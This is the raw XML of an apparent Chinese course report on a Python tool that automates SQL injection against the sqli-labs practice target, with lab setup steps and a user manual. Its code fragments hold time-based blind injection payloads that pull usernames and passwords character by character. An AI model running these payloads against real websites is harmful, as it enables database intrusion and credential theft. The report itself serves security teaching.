    <w:p w14:paraId="1F1A670A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result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF9E08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if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E89F9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            cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FF2F7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    cols_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628E1F2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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    ret ← cols</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2].split(', ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970D044" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00924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hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F281E3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6DE2B7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9F6CFB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spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_values_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24C59C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 for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 1 to 15:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD9EC8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  if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C811F79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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 1 to 15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A11D01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 data_len ← 'uname': symbol + f" or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(select length(username) from users where id={ind})={i},1,sleep(0.001))#" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2841B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 result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2EA5B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 if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65158A23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  length ←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</w:p>
    <w:p w14:paraId="06613BD5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  break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41090F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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1, length + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69056481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 for j in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEDA3D3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  data ← 'uname': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii(substr((select username from users limit " + str(ind - 1) + ",1),{0},1))={1},1,sleep(0.001))#".format(i, j) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB28BE6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  result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADE3E0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  if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0BE2BE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  users_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620648BF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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users.append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>(users_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621AA4B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 for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1, 15):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748ED017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  if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2022F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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1, 15):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA9A6C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 data_len ← 'uname': symbol + f" or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(select length(password) from users where id={ind})={i},1,sleep(0.001))#"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2D071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 result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41334329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 if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A45A01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  length ←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</w:p>
    <w:p w14:paraId="4A1DB799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  break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71193D40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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to  length</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FA3D4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 for j in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4CE54A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 xml:space="preserve">        data ← 'uname': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii(substr((select password from users limit " + str(ind - 1) + ",1),{0},1))={1},1,sleep(0.001))#".format(i, j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330529AA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  result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request(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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C3A2B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  if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0748A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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3A1B5" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F72DA" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00924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  <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C1B96F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12F3B0A4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244C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</w:p>
    <w:p w14:paraId="29CC4AD6" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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4.函数的调用关系图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FC39E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7DE04FFF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="571581C8" wp14:editId="6F20C107">
            <wp:extent cx="5713095" cy="2040890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="sql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qli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895" cy="20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F468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14:paraId="78D1FC8A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2AD23444" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="100" w:firstLine="24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附录：源程序文件名清单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2BF18A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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sqli.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE16FE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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Get:bool_based.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="582502A3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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 xml:space="preserve">    time_based_module.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE30481" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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Post:bool_util.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="063081D0" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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 xml:space="preserve">     err_util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0BDD7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="400" w:firstLine="96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 xml:space="preserve">     time_util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF9A33" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="600" w:firstLine="144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union_bsd_plus_err.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB801A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="600" w:firstLine="144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722E3CA9" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="600" w:firstLine="144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72DA09B7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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5.实例测试及运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B3A818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569A0E8C" wp14:editId="6F2CE500">
            <wp:extent cx="5967095" cy="7632700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="11" name="图片 11" descr="A}9URAJPI~QM@YBX1_`Y0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}9URAJPI~QM@YBX1_`Y0W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753" cy="76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68E0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14:paraId="5F783024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285A3088" wp14:editId="27048AE1">
            <wp:extent cx="5268595" cy="7326630"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
            <wp:docPr id="10" name="图片 10" descr="N$PSS{KS3)5$]SI@Y`W59%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N$PSS{KS3)5$]SI@Y`W59%K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BBF5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28C6688B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5EA55B5C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08AEC17A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33410BC2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616CF248" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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6.实现提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97A812" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pP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⑴ 平台搭建 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417944D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在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VMWorkstation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中搭建实验环境，即：MAMP=Windows Server、Apache、MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A13F0A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和 PHP，可以使用 Wamp 包搭建 PHP 集成开发环境，安装包是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Wampserver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。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Phpstudy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：http://down.php.cn/PhpStudy20180211.zip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC4039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所需安装环境支持包：http://www.pc6.com/softview/SoftView_104246.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B387929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⑵ 测试靶机 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D0B6A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C5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下载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ql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-labs，下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>https://github.com/Audi-1/sqli-labs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，下载后务必将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q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的版本调到 5.5 以上，因为这样你的数据库内才会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information_schema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数据库，方便进行实验测试。将之前下载的源码解压到 www 目录下，修改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q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-connections/db-creds.inc文件当中的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ysq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账号密码。用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ql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-labs 靶机作为目标机进行测试。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB9C1A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18A06CEF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="100" w:firstLine="240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黑体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>用户手册（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>python 语言实现环境）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FDE58" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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（1）本程序的运行环境为Windows操作系统，执行文件为sqli.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81C7CA" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:widowControl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2)进入演示程序后，在主函数中指定less关卡的值，程序便会从当前关卡开始进行爆破。程序会根据每一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关不同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的URL来判断不同的注入类型，构造相应的payload，并在控制台输出数据库名、表名、表中的数据。每一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关成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之后，程序会自动将关卡数less加1，自动进入下一关进行运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA407D" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:keepNext/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(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7450996D" wp14:editId="531AD392">
            <wp:extent cx="5852160" cy="2425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489" cy="24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C66A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C5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14:paraId="2610A388" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675E55C5" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290D5DB4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D094E4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc104974581"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
